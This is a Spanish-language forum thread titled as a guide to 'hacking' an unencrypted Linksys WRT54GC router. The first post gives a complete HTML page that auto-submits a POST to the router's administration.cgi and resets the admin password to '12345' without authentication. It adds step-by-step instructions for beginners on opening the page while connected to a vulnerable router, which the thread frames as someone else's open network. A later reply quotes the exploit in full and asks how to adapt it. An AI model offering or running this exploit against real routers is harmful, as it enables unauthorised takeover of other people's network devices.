¡Cómo "hackear" un router Linksys WRT54GC no cifrado!

(1/1)

RedKnight:
El router Linksys WRT54GC no comprueba la identidad del administrador al cambiar la contraseña de este, por lo tanto, es posible cambiarla a través de la siguiente consulta POST si tienes acceso a la red (por ejemplo, porque no está cifrada  :xD):

Código:

<html><body>
<form method="POST" action="http://IP_ROUTER(por defecto 192.168.1.1)/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>


<!-- C?digo de envio autom?tico do formul?rio -->


<SCRIPT language="javascript">
  document.senha.submit();
</SCRIPT>


</body></html>

NOTA PARA LOS NEWBIES: para utilizar el código, debéis abrir el bloc de notas,
copiarlo, modificarlo y guardarlo con la extensión .html, y abrir el archivo resultante cuando estéis conectados al router vulnerable.

Para más información: http://www.securityfocus.com/bid/34616/info


genomma:
Cita de: RedKnight en  3 Mayo 2009, 19:58 pm

El router Linksys WRT54GC no comprueba la identidad del administrador al cambiar la contraseña de este, por lo tanto, es posible cambiarla a través de la siguiente consulta POST si tienes acceso a la red (por ejemplo, porque no está cifrada  :xD):

Código:

<html><body>
<form method="POST" action="http://IP_ROUTER(por defecto 192.168.1.1)/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>


<!-- C?digo de envio autom?tico do formul?rio -->


<SCRIPT language="javascript">
  document.senha.submit();
</SCRIPT>


</body></html>

NOTA PARA LOS NEWBIES: para utilizar el código, debéis abrir el bloc de notas,
copiarlo, modificarlo y guardarlo con la extensión .html, y abrir el archivo resultante cuando estéis conectados al router vulnerable.

Para más información: http://www.securityfocus.com/bid/34616/info





YO tengo un Linksys WRT54G seriviría este Script????   que modificaciones le tengo que hacer si mi direccion es 192.168.1.1????

Debci:
Como ya dice el compañero, es la que se usa por defecto, lee un poco el codigo que aunque no sepas programar se sobre-entiende, que es Html tio...

Saludos

Navegación

[0] Índice de Mensajes